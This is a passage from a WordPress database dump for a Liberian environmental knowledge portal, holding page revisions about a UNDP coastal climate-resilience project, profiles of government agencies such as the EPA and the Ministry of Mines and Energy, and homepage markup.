rising sea levels or storm surges. Many live on very low lying land, often in unplanned, illegal settlements and with the expected rise in sea levels as a result of climate change, combined with increasing storms and sea-surges with significant negative impacts on the lives and livelihoods of people in coastal areas. Already, major economic sectors like fishing and farming are seriously affected as a result of increasing displacement of people caused by flooding and other climate change related disasters.\r\n\r\nThe Enhancing Resilience of Vulnerable Coastal Areas to Climate Change Risks in Liberia (Coastal Project for short), is aimed at helping coastal communities in three counties develop defensive mechanism against the effects of climate change. The project, launched by the United Nations Development Programme and the Government of Liberia in 2010  aims to reduce vulnerability and build resilience of local communities and socio-economic sectors to withstand the threats of climate change in Liberia’s coastal areas. The project is implemented in three counties, hard hit by the effects of climate change – Grand Cape Mount, Montserrado and Grand Bassa.\r\n\r\nThe project demonstrates how low-cost, low-technology sustainable measures can be adapted to address the effects of climate change in the Liberian context. Through the Coastal Project, the selected communities showcase sustainable methods of community protection against rising sea levels, storms  as well as how to manage coastal ecosystems.','Enhancing Resilience of Vulnerable Coastal Areas','','inherit','closed','closed','','2558-revision-v1','','','2019-11-19 16:48:00','2019-11-19 16:48:00','',2558,'https://ekmsliberia.info/2558-revision-v1/',0,'revision','',0),(2565,1,'2019-11-20 00:39:42','2019-11-20 00:39:42','<p>System ID: {@ID}</p>\r\n<p>Status: {@project_status}</p>\r\n<p>Implemented by: {@resource_tag}</p>\r\n<p>Project Link: {@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:39:42','2019-11-20 00:39:42','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2566,1,'2019-11-20 00:41:09','2019-11-20 00:41:09','<p>System ID: {@ID}</p>\r\n<p>Status: {@project_status}</p>\r\n<p>Implemented by: {@resource_tag}</p>\r\n<p>Project Link:{@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:41:09','2019-11-20 00:41:09','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2567,1,'2019-11-20 00:43:23','2019-11-20 00:43:23','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>System ID: {@ID}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Status: {@project_status}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Implemented by: {@resource_tag}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Project Link:{@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:43:23','2019-11-20 00:43:23','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2568,1,'2019-11-20 00:44:18','2019-11-20 00:44:18','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>System ID: {@ID}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Status: {@project_status}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Implemented by: {@resource_tag}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link:{@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:44:18','2019-11-20 00:44:18','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2569,1,'2019-11-20 00:46:50','2019-11-20 00:46:50','','Funder','','publish','closed','closed','','funder','','','2019-11-20 00:46:50','2019-11-20 00:46:50','',449,'https://ekmsliberia.info/?post_type=_pods_field&p=2569',0,'_pods_field','',0),(2570,1,'2019-11-20 00:46:50','2019-11-20 00:46:50','','Partners','','publish','closed','closed','','partners','','','2019-11-20 00:46:50','2019-11-20 00:46:50','',449,'https://ekmsliberia.info/?post_type=_pods_field&p=2570',1,'_pods_field','',0),(2571,1,'2019-11-20 00:48:35','2019-11-20 00:48:35','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>System ID: {@ID}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Status: {@project_status}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Implemented by: {@resource_tag}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link:{@</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link:{@project_link}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link:{@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:48:35','2019-11-20 00:48:35','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2572,1,'2019-11-20 00:50:29','2019-11-20 00:50:29','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>System ID: {@ID}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Status: {@project_status}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Implemented by: {@resource_tag}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Funded By: {@funder}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Partner: {@partners}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Link: {@project_link}</p>','Project Resource Template','','inherit','closed','closed','','462-revision-v1','','','2019-11-20 00:50:29','2019-11-20 00:50:29','',462,'https://ekmsliberia.info/462-revision-v1/',0,'revision','',0),(2573,1,'2019-11-20 00:56:47','2019-11-20 00:56:47','','featured_mme_project','Photo Credit: MME','inherit','open','closed','','featured_mme_project','','','2019-11-20 00:57:15','2019-11-20 00:57:15','',2558,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg',0,'attachment','image/jpeg',0),(2575,1,'2019-11-20 01:13:43','2019-11-20 01:13:43','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-20 01:13:43','2019-11-20 01:13:43','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2576,1,'2019-11-20 01:16:07','2019-11-20 01:16:07','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-20 01:16:07','2019-11-20 01:16:07','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2577,1,'2019-11-20 01:18:57','2019-11-20 01:18:57','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-20 01:18:57','2019-11-20 01:18:57','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2578,1,'2019-11-20 01:22:40','2019-11-20 01:22:40','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-20 01:22:40','2019-11-20 01:22:40','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2579,1,'2019-11-20 01:23:07','2019-11-20 01:23:07','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-20 01:23:07','2019-11-20 01:23:07','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2580,1,'2019-11-20 01:23:53','2019-11-20 01:23:53','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-20 01:23:53','2019-11-20 01:23:53','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2581,1,'2019-11-20 01:26:47','2019-11-20 01:26:47','<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.</p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-20 01:26:47','2019-11-20 01:26:47','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2582,1,'2019-11-20 01:32:35','2019-11-20 01:32:35','<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p><p>In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.</p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.</p><h4>Mandate</h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-20 01:32:35','2019-11-20 01:32:35','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2587,1,'2019-11-20 08:52:40','2019-11-20 08:52:40','Liberia is recognized globally as a top conservation priority in the West African region, as it has significantly high levels of species endemic and accounts for 42% of West Africa‘s remaining Upper Guinean Forest, a humid coastal rainforest belt and a global Biodiversity Hotspot that stretches across the other West African countries of Cote d‘Ivoire, Ghana, Sierra Leone and Togo.\n\nLiberia‘s forest ecosystems harbour the highest populations of elephants in the region and are a home of over 225 timber tree species,2000 flowering plant species, 140 mammal species, 600 bird species, 75 amphibian and reptile species and over 1000 species of identified insects which must be conserved, utilized equitably and managed sustainably. There remains a countless number of animals, plants and other organisms of Liberia‘s resource rich and diversified ecosystems which science has yet to discover.\n\nHowever, in the last 3 decades, more than any other time in Liberia‘s history, poorly regulated human activities have significantly degraded most of the ecosystems of note, resulting in an unprecedented loss of biodiversity. Taking one ecosystem for an example, it is approximated that over 60% of the country‘s forested landscapes is degraded and this must have resulted in the extinction of hundreds of thousands of animals, plants and other organisms. Sustained action towards a responsible and credible governance and sustainable management and use of Liberia‘s critical natural resource base is the single most important challenge the country faces and meeting this challenge must begin with addressing the causes of the loss of biodiversity of the various ecosystems.\n\nAs a testimony of her seriousness of purpose to meet the challenge in point, the Liberian Government signed the Convention on Biological Diversity (CBD) in the year 2000 and in 2002, prepared the first draft of a National Biodiversity Strategy &amp; Action Plan (NBSAP) that underscored the significance attached to the intrinsic and extrinsic values of biological resources.','Forest Biodiversity','Liberia is recognized globally as a top conservation priority in the West African region, as it has significantly high levels of species endemic and accounts for 42% of West Africa‘s remaining Upper Guinean Forest, a humid coastal rainforest belt and a global Biodiversity Hotspot that stretches across the other West African countries of Cote d‘Ivoire, Ghana, Sierra Leone and Togo.','inherit','closed','closed','','473-autosave-v1','','','2019-11-20 08:52:40','2019-11-20 08:52:40','',473,'https://ekmsliberia.info/473-autosave-v1/',0,'revision','',0),(2588,1,'2019-11-20 09:11:25','2019-11-20 09:11:25','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-20 09:11:25','2019-11-20 09:11:25','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2589,1,'2019-11-20 09:13:47','2019-11-20 09:13:47','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" 